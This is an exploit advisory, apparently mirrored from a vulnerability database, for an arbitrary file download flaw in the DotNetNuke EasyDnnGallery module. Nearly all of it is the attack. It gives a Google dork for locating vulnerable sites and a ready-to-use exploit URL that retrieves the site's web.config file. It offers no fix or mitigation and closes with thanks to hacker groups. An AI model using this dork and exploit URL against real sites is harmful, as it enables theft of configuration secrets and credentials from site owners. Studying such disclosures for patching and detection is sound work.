Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:30834
HistoryJun 14, 2014 - 12:00 a.m.

DNN (DotNetNuke®) EasyDnnGallery Module Arbitrary File Download Vulnerability

2014-06-1400:00:00
vulners.com
164

#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Title : DNN (DotNetNuke®) EasyDnnGallery Module Arbitrary File Download Vulnerability

Author : alieye

vendor : http://www.easydnnsolutions.com/ , http://store.dnnsoftware.com/

Contact : [email protected]

Risk : High

Class: Remote

Google Dork: inurl:/EasyDnnGallery/

Version: all version

Date: 09/06/2014

os : windows server 2008

#++++++++++++++++++++++++++++++++++++++++++++++++++++++++

You can download any file from your target

Exploit : http://victim.com/DesktopModules/EasyDnnGallery/ImageDownload.aspx?file=~/web.config

#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , andelos , 3.14nnph , f4rm4nd3 and all cseye members
[#] Thanks To All Iranian Hackers
[#] website : http://cseye.vcp.ir/
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++